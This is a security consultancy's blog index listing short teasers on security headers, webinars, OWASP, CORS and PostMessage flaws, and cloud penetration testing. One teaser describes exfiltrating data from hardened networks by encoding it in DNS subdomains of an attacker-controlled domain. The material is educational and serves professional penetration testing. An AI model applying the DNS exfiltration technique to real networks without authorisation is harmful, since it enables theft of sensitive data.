Contact us: info@akimbocore.com

Your Vulnerability Management Sucks

Published: 16 March 2022

On March 16th I had the pleasure of speaking at the Yorkshire Cyber Security Cluster about Vulnerability Management. I've included my slides from the presentation and some speaker notes on the content covered here.


Continue Reading

HTTP Security Headers: Cache-Control

Published: 21 February 2022

The Cache-Control HTTP server response header specifies whether the server response can be cached by the web browser and any interim devices such as web proxies. Generally, if the content of the page includes confidential information, then it should not be cached, as if confidential information is cached on user's device, and that device is a public device, or shared with other users then the information may be compromised by another user with access to the device.


Continue Reading

HTTP Security Headers: X-Frame-Options

Published: 21 February 2022

The X-Frame-Options header can be used to specify whether a web browser should be allowed to render the target page in a frame (such as a frame, iframe, embed, or an object tag). This can be used to prevent attacks such as ClickJacking.


Continue Reading

[Webinar] Your Security Testing Sucks

Published: 10 February 2022

Akimbo hosted a Webinar to cover hints and tips about how to implement effective penetration testing. We're sharing the recording for those that couldn't make it on the day!


Continue Reading

[Webinar] What Has Awareness Ever Given Us?

Published: 17 January 2022

Akimbo joined Ian Murphy from CyberOff for a Webinar to cover hints and tips about how to implement effective security awareness. We're sharing the recording for those that couldn't make it on the day!


Continue Reading

[Webinar] Your System Hardening Sucks

Published: 17 December 2021

Akimbo hosted a Webinar to cover hints and tips about how to implement effective system hardening. We're sharing the recording for those that couldn't make it on the day!


Continue Reading

[Webinar] Your Security Awareness Training Sucks

Published: 13 December 2021

Akimbo hosted a Webinar to cover hints and tips about running more effective Security Awareness Training. We're sharing the recording for those that couldn't make it on the day!


Continue Reading

The OWASP Top 10

Published: 03 December 2021

The "OWASP Top 10", an awareness document that is updated roughly every three years and covers ten significant categories of vulnerabilities that organisations should be concerned about. The vulnerability categories are ordered based on a combination of potential impact, exploitability, and prevalence. The latest version was released in September 2021


Continue Reading

ScotSoft: Building and Breaking Web Applications

Published: 11 October 2021

On October 7th I had the pleasure of speaking at ScotSoft 2021 about Penetration Testing and breaking Web Applications. I've included my slides from the presentation and some speaker notes on the content covered here.


Continue Reading

What is Penetration Testing?

Published: 22 August 2021

Penetration Testing, often abbreviated to PenTesting, is a method of testing the security of a system through attempting to discover and actively exploit vulnerabilities within the system. It is amongst the most effective methods of determining the actual risk posed by a system. This is due to the fact that the risk of present vulnerabilities is not estimated but they are exploited to determine how much leverage they would offer an attacker.


Continue Reading

HTML5: Cross Domain Messaging (PostMessage) Vulnerabilities

Published: 06 August 2021

HTML5 PostMessages (also known as: Web Messaging, or Cross Domain Messaging) is a method of passing arbitrary data between domains. However if not implemented correctly it can lead to sensitive information disclosure or cross-site scripting vulnerabilities as it leaves origin validation up to the developer!


Continue Reading

HTML5: Cross Origin Resource Sharing (CORS) Vulnerabilities

Published: 06 August 2021

So by default SOP won’t allow bi-directional communications between two separate origins, however as applications scale up there may be a requirement to allow this kind of thing. Think of companies such as Google, who also owns YouTube – or Microsoft who also owns Outlook and Skype. They may well want inter-origin communications.


Continue Reading

An Introduction to PenTesting Azure

Published: 06 August 2021

I recently wrote an introduction to PenTesting an AWS Environment. A sensible place to start given that I included that in Q1 of 2018 Amazon holds a 33% market share in cloud whereas Microsoft only holds 13%. However I did want to add a few notes that are specific to PenTesting within Azure environments here.

Many of the concepts are the same however, in my AWS article I broke the perspective a penetration tester could take of a cloud environment down into testing “on the cloud”, “in the cloud”, and “testing the cloud console.” That concept remains the same, which is:


Continue Reading

Spoofing Packets and DNS Exfiltration

Published: 06 August 2021

Following a successful penetration test, you may have large amounts of data to exfiltrate from an environment specifically hardened to make it difficult to exfiltrate data. For example, the network might have a firewall that explicitly blocks common exfiltration methods – such as SSH, HTTPS, HTTP.

It is common that you can still exfiltrate data from these networks by using DNS. For example you could make a request to a domain name that you control where the subdomain contains some information to be exfiltrated. Such as sensitive-data-here.attacker.example.com. DNS is a recursive system, such that if you send this request to a local DNS server, it will forward it on and on until it reaches the authoritative server. If you control the authoritative server, you can simply read the sensitive data from the DNS logs.


Continue Reading

An Introduction to Penetration Testing AWS

Published: 06 August 2021

When penetration testing Amazon Web Services (AWS) environments there are different perspectives the assessment could consider, some are very similar to external infrastructure/web application assessments and some are different.

I’ll separate the things that are the same from the things that are different to traditional penetration testing by considering the following types of cloud testing and then breaking each one down into the kinds of testing that could take place:


Continue Reading